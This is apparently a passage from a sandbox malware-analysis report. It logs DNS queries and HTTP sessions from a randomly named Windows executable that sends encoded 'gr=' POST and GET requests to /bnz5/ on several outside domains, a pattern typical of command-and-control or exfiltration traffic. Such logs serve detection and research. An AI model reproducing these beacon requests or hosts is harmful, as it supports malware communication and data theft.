                                                                                                      Apr 16, 2024 12:02:40.378747940 CEST1.1.1.1192.168.2.50xd50fNo error (0)www.seatheskydesign.online66.96.162.136A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:54.148458958 CEST1.1.1.1192.168.2.50x607bNo error (0)www.naglissere.ru185.215.4.13A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:03:07.875504971 CEST1.1.1.1192.168.2.50x6ab2Name error (3)www.aretikokkoris.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                                      0           192.168.2.5  49717        174.138.177.173  80                2940  C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                      Apr 16, 2024 11:59:23.736241102 CEST  454  OUT  GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=4BEdEKurUNEFwkFRegiDBzC7pj7sTtT0kB0gdoDHo+aBzggPclQDQJqF4ehpSB3lBDvuZzIzoYk2h0Zy/GWQSTC2T/c7HqqgmNNGpbvCRxrYpdpNw0fXnMi51aRJIBirrQ== HTTP/1.1
                                                                                                      Host: www.elysiangame.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 11:59:23.859477997 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      content-type: text/html
                                                                                                      content-length: 1251
                                                                                                      date: Tue, 16 Apr 2024 09:59:23 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) ins
                                                                                                      Apr 16, 2024 11:59:23.859514952 CEST  218  IN
                                                                                                      Data Ascii: et;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                      1           192.168.2.5  49718        91.195.240.117  80                2940  C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                      Apr 16, 2024 11:59:39.286670923 CEST  727  OUT  POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.blueberry-breeze.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.blueberry-breeze.com
                                                                                                      Referer: http://www.blueberry-breeze.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=U5lbigM/lzYTqGWqKR9cPhlxEl2Uc5AmbFpe6342j1GnMNfuxvwJWkF+Ikkjfvg9RtAgkqOWnY5rhUT/ccvxPEb1W/UhU1qDH8+H7mMde8ZL26AQY0vthPq4jEd1DxcAWH44Urky1RkpDfLc311tneRNlr0zclZeY5NCh6kmjOOItgPOSRRWGhy6k6qIT1oNgQl9gXA=


                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                      2           192.168.2.5  49719        91.195.240.117  80                2940  C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                      Apr 16, 2024 11:59:42.027034998 CEST  747  OUT  POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.blueberry-breeze.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.blueberry-breeze.com
                                                                                                      Referer: http://www.blueberry-breeze.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=U5lbigM/lzYT7SSqN2hcOBlydV2UFJAibFle62smjGunCI7uwuwJVkF+QUkmSPg2RtNVkuGWncRrhUj/fv3yNUbNDvUnLlqDH8+H7ikke8BL2JYQYWHun/q7qkd1RBcEWH4OUq5d1ScpDavc0k1sseRL4b1NRnxXRZZ+tchS6ICKl2ikIzZ+VBeC0pi/CFJk6z1N+AXRajJWOxHeV8vc19lQgpiG
                                                                                                      Apr 16, 2024 11:59:42.243251085 CEST  701  IN  HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 09:59:42 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                      3           192.168.2.5  49720        91.195.240.117  80                2940  C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                      Apr 16, 2024 11:59:44.885751009 CEST  1764  OUT  POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.blueberry-breeze.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.blueberry-breeze.com
                                                                                                      Referer: http://www.blueberry-breeze.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 11:59:45.097322941 CEST  701  IN  HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 09:59:44 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      4 | 192.168.2.5 | 49721 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 11:59:47.622231007 CEST | 456 | OUT | GET /bnz5/?gr=Z7N7hXY/vxItmyrXNQB4LENYEQnuSZ4/X1tSw0B7uFqoJtXe6IwXeXQiXEM/Xr4/ado0xvKOz5lKhVT9TZmVC0ntJKIXA1qlQqDuwiNLRNgNzKASDET1ivmJ23BpeRNTPw==&kFGTX=Q6OxIXo8tXD HTTP/1.1
                                                                                                      Host: www.blueberry-breeze.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 11:59:47.834570885 CEST | 107 | IN | HTTP/1.1 436
                                                                                                      date: Tue, 16 Apr 2024 09:59:47 GMT
                                                                                                      content-length: 0
                                                                                                      server: NginX
                                                                                                      connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      5 | 192.168.2.5 | 49723 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 11:59:53.360054016 CEST | 733 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.collegeclubapparel.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.collegeclubapparel.com
                                                                                                      Referer: http://www.collegeclubapparel.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=p9ZCUqKgPiNV52ifilHDi4+i5HQGEB3KVXz3SwE1M7JthMmx0dGQiJJWAjG2QSfqQMTo3c6/4Xff/OkSYnU/i7qauLsUrA+EzhuQ6wYisLvbnvVM4Xhq59ZHe328e2FE9I64Q+vBFCDbtULyfYLwFTmXFTLKi5a5IlZcTZfR4g3aH0Iwx/NwBOD5tGHZRvRTz5pA1+s=
                                                                                                      Apr 16, 2024 11:59:53.572321892 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 09:59:53 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      6 | 192.168.2.5 | 49724 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 11:59:56.089665890 CEST | 753 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.collegeclubapparel.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.collegeclubapparel.com
                                                                                                      Referer: http://www.collegeclubapparel.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=p9ZCUqKgPiNVjXSfjGvDq4+h1nQGNh3OVXv3SxwlNNhtgt6x1cGQlJJWLDGzUSfhQMPG3dq/4T/f/LYSYQI8z7qc3bsWvA+EzhuQ6xpHsLnbgflM4yNp0dZAb328MGED9I6gQ73nFBrbtWTyfLSmeDmRaDLflrbRHTscR4yIgzrVCClardFYSuvB9VPuAfw6pa5wrp4duEFopeI5Ixj1e4f0xpt1
                                                                                                      Apr 16, 2024 11:59:56.301956892 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 09:59:56 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      7 | 192.168.2.5 | 49725 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 11:59:58.824157953 CEST | 1770 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.collegeclubapparel.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.collegeclubapparel.com
                                                                                                      Referer: http://www.collegeclubapparel.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 11:59:59.039840937 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 09:59:58 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      8 | 192.168.2.5 | 49726 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:00:02.105271101 CEST | 458 | OUT | GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=k/xiXeKkElN9lmj7tVr8idaf/wpGLS/XfVixYgRWGr55oYC/zYvRgJVTIR6Icyf7C+fnrNLi6yuD3OJtT3FnzryZpasAqgaz10+v5QpHvKqHjO9njldZ1cZrBWCORkcOsw== HTTP/1.1
                                                                                                      Host: www.collegeclubapparel.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:00:02.317255974 CEST | 107 | IN | HTTP/1.1 436
                                                                                                      date: Tue, 16 Apr 2024 10:00:02 GMT
                                                                                                      content-length: 0
                                                                                                      server: NginX
                                                                                                      connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      9 | 192.168.2.5 | 49727 | 43.132.191.179 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:00:08.506663084 CEST | 712 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.vvbgsekbo.store
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.vvbgsekbo.store
                                                                                                      Referer: http://www.vvbgsekbo.store/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=E7E9kPoFz7j9kLc0eR4Ppu30JK8oBSqFwDbaVJ+aelUXq6Db8DzmdW0aHsRqMdm2MJoDWt+SpuP3mpyk0e6tda+FRt/KzysCEBbH6zcMAhn01E1avmJbCqWsLFP1fF5iyN5vHyVnn71S+8cV3h8chP4pjghQxPt3QPwyHsus+sDbSyGL3aUy4IGXAXA6wiqff+7vS2c=
                                                                                                      Apr 16, 2024 12:00:08.866709948 CEST | 398 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 16 Apr 2024 10:00:08 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Allow-Methods: *
                                                                                                      Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,Token
                                                                                                      Content-Encoding: gzip
                                                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 140


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      10 | 192.168.2.5 | 49728 | 43.132.191.179 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:00:11.355138063 CEST | 732 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.vvbgsekbo.store
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.vvbgsekbo.store
                                                                                                      Referer: http://www.vvbgsekbo.store/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=E7E9kPoFz7j9lvY0Ng4P8e3zV68obiq/wDfaVI7CeXAXreLbuyzmIW0aIMRvC9mtMJkhWo+Spvr3moCk3uGqPa+HeN/M3ysCEBbH6y42AgP011Fao0xaLKWrbVP1bF5myN5NHzIAn4dS+9sV20IDuP4r+whC2KELd515N8rmoubdekrht4caroqvQEINhSL2FdrfMhLyLdiuyoLFaBuqK2DGiDFm
                                                                                                      Apr 16, 2024 12:00:11.710948944 CEST | 398 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 16 Apr 2024 10:00:11 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Allow-Methods: *
                                                                                                      Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,Token
                                                                                                      Content-Encoding: gzip
                                                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 140


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      11 | 192.168.2.5 | 49730 | 43.132.191.179 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:00:14.194952965 CEST | 1749 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.vvbgsekbo.store
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.vvbgsekbo.store
                                                                                                      Referer: http://www.vvbgsekbo.store/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:00:14.550072908 CEST | 398 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 16 Apr 2024 10:00:14 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Allow-Methods: *
                                                                                                      Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,Token
                                                                                                      Content-Encoding: gzip
                                                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 140


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      12 | 192.168.2.5 | 49731 | 43.132.191.179 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:00:18.080573082 CEST | 451 | OUT | GET /bnz5/?gr=J5sdn6UHwrTFsLl7PSE+273sNdFQMS+e/Eepb66AdUMKjr/OxnnLPWtAHrBNDsqMNKwlUYW9tPjJnamC/Yv4erSiZvDT3TM3BG/s9HlMNwb39HB/smoNNYSAbH35aGk1gA==&kFGTX=Q6OxIXo8tXD HTTP/1.1
                                                                                                      Host: www.vvbgsekbo.store
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:00:18.436594963 CEST | 348 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 16 Apr 2024 10:00:18 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Allow-Methods: *
                                                                                                      Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,Token
                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      13 | 192.168.2.5 | 49732 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:00:23.804136038 CEST | 715 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.mytemplotech.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.mytemplotech.com
                                                                                                      Referer: http://www.mytemplotech.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=718vMEZ/YzlaNn5HlwmVJBLz6Bokv5OgQGzvLTsk2N9ID8xRrpA+Xp/JUzkXsUMKzjk/ZI7j+x3JbB61oLdfjTyafqMsSIQsN3XQoPVKP54DrC7Ac152dJr4JGzHveD8XY0PbhaRwAeqwlpCNeTbLbx8Z+Ht2o08YoecH/OOElS6W0GcaXR4FGzgmSEfJEuYBplKsuw=
                                                                                                      Apr 16, 2024 12:00:24.015396118 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:00:23 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
